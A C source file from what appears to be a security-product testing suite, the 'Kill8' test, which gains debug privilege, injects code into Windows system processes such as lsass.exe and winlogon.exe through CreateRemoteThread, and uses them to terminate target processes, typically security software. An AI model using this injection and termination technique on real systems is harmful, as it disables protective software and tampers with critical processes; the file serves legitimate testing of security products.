/*

 Security Software Testing Suite - Kill8 (termination test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * This technique is used by Advanced Process Termination - Kill 12, written by Diamond Computer Systems,
     http://www.diamondcs.com.au/.


 Method description:

   * Obtain the Debug privilege.

   * Open a helper process.

   * Allocate memory in the helper process and write the infection code into it.

   * Use CreateRemoteThread function to create a remote thread that executes the infection code
     inside the helper process.

   * The infection code tries to open and terminate the target processes.

   * The whole procedure is executed with helper processes "services.exe", "winlogon.exe", "lsass.exe" and "csrss.exe".

   * This test works with a list of processes and reports success if in at least one process was terminated.


 Known issues and warnings:

   * After termination attempts, this test waits for a while to give the target processes a chance to terminate.
     During this time no new process should be started, otherwise there is a chance to receive false negative results.

*/

#include <stdio.h>
#include <windows.h>
#include "include/common.h"
#include "include/common-hook.h"
#include "include/common-univ.h"


int main(int argc,char **argv)
{
  COM_CONF conf;
  if (!com_console_init_main("kill8","kill8",argc,argv,&conf,COM_TEST_TYPE_KILL8)) return 1;

  char *used_dlls[]={"ntdll.dll","kernel32.dll","advapi32.dll"};
  if (!com_hook_load_libraries(used_dlls,3)) return 1;

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;
  char *err_prefix=COM_ERR_STANDARD_PREFIX;

  if (!com_privilege_enable_debug(&err_inf))
    com_err_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX);


  int pids_cnt=0;
  ULONG pids[conf.processes_cnt];
  int ret=com_proc_get_pids_from_names(conf.processes,pids,conf.processes_cnt,&err_inf);
  if (ret)
  {
    for (int i=0;i<conf.processes_cnt;i++)
    {
      if (pids[i]!=COM_CID_INVALID)
      {
        if (com_verbosity_get()) printf("Process \"%s\" found with PID %ld.\n",conf.processes[i],pids[i]);
        pids_cnt++;
      } else fprintf(stderr,"ERROR: Unable to find target process \"%s\".\n\n",conf.processes[i]);
    }
  }

  if (ret)
  {
    char *helpers[]={"services.exe","winlogon.exe","lsass.exe","csrss.exe",NULL};

    int helper_idx=0;
    while (helpers[helper_idx] && (pids_cnt>0) && !res)
    {
      if (com_verbosity_get()) printf("\n");

      ULONG helper_pid=COM_CID_INVALID;
      ret=com_get_pid_from_name(&helper_pid,helpers[helper_idx],&err_inf);
      if (ret && (helper_pid!=COM_CID_INVALID))
      {
        if (com_verbosity_get()) printf("Helper process \"%s\" found with PID %ld.\n",helpers[helper_idx],helper_pid);

        DWORD access=PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
        PCOM_UNIV_JOB jobs[2];
        if (com_univ_job_init(10,sizeof(access)+sizeof(helper_pid)+3*sizeof(HANDLE),4,&jobs[0],&err_inf))
        {
          com_univ_job_stack_init_push(jobs[0],&access,sizeof(access));
          com_univ_job_stack_init_push(jobs[0],&helper_pid,sizeof(helper_pid));

          com_univ_job_action_set(jobs[0],0,COM_UNIV_JOB_ACTION_EXECUTE_ALWAYS,com_univ_server_init);
          com_univ_job_action_set(jobs[0],1,0,com_univ_handle_obtain_open_process);

          com_univ_job_action_set_arg(jobs[0],2,1,com_univ_job_stack_push_copy,-1);       // copy process handle
          com_univ_job_action_set_arg(jobs[0],3,2,com_univ_job_stack_push_copy,-1);       // copy process handle
          com_univ_job_action_set(jobs[0],4,3,com_univ_structure_alloc_write);
          com_univ_job_action_set(jobs[0],5,4,com_univ_structure_start_create_remote_thread);

          com_univ_job_action_set_arg(jobs[0],6,5,com_univ_job_stack_push_copy,-1);       // copy thread handle
          com_univ_job_action_set(jobs[0],7,6,com_univ_wait_mapping_event_handle);
          com_univ_job_action_set(jobs[0],8,5,com_univ_handle_close);                     // close thread handle
          com_univ_job_action_set(jobs[0],9,1,com_univ_handle_close);                     // close process handle

          access=PROCESS_TERMINATE;
          if (com_univ_job_init(1+pids_cnt*4+2,pids_cnt*(sizeof(ULONG)+sizeof(DWORD)+2*sizeof(HANDLE)),pids_cnt*4,&jobs[1],&err_inf))
          {
            for (int i=0;i<conf.processes_cnt;i++)
            {
              if (pids[i]!=COM_CID_INVALID)
              {
                com_univ_job_stack_init_push(jobs[1],&access,sizeof(access));
                com_univ_job_stack_init_push(jobs[1],&pids[i],sizeof(pids[i]));
              }
            }

            com_univ_job_action_set(jobs[1],0,COM_UNIV_JOB_ACTION_EXECUTE_ALWAYS,com_univ_client_init);

            int action_idx=0;
            for (int i=0;i<conf.processes_cnt;i++)
            {
              if (pids[i]!=COM_CID_INVALID)
              {
                com_univ_job_action_set(jobs[1],action_idx+1,action_idx+0,com_univ_handle_obtain_open_process);
                com_univ_job_action_set_arg(jobs[1],action_idx+2,action_idx+1,com_univ_job_stack_push_copy,-1);   // copy process handle
                com_univ_job_action_set(jobs[1],action_idx+3,action_idx+2,com_univ_terminate_process);
                com_univ_job_action_set(jobs[1],action_idx+4,action_idx+1,com_univ_handle_close);
                action_idx+=4;
              }
            }

            com_univ_job_action_set(jobs[1],action_idx+1,0,com_univ_client_send_result);
            com_univ_job_action_set(jobs[1],action_idx+2,0,com_univ_client_finit);

            PCOM_UNIV univ=NULL;
            if (com_univ_init(0,"kill8",2,jobs,&univ,&err_inf))
            {
              int index=com_univ_main(univ);

              res=com_proc_termination_report(conf.processes,pids,conf.processes_cnt,&err_inf);
              if (!res)
              {
                if (err_inf.occurred)
                  com_err_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX);

                if (!univ->error.occurred)
                  memcpy(&univ->error,&univ->server_mapping.data->error,sizeof(univ->error));

                if (univ->error.occurred)
                {
                  if (univ->error.job_index==1) err_prefix="\nCHILD PROCESS ERROR: ";
                  com_univ_server_err_report(univ,&err_inf);
                  com_err_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX);
                }
              }

              if (index>=0) com_univ_server_finit(univ,NULL);

              com_univ_finit(univ);
            }

            com_univ_job_finit(jobs[1]);
          }

          com_univ_job_finit(jobs[0]);
        }
      } else if (ret) fprintf(stderr,"ERROR: Unable to find helper process \"%s\".\n\n",helpers[helper_idx]);
      else break;

      helper_idx++;
    }
  }

  return com_end_pref(res,&err_inf,&conf,err_prefix);
}
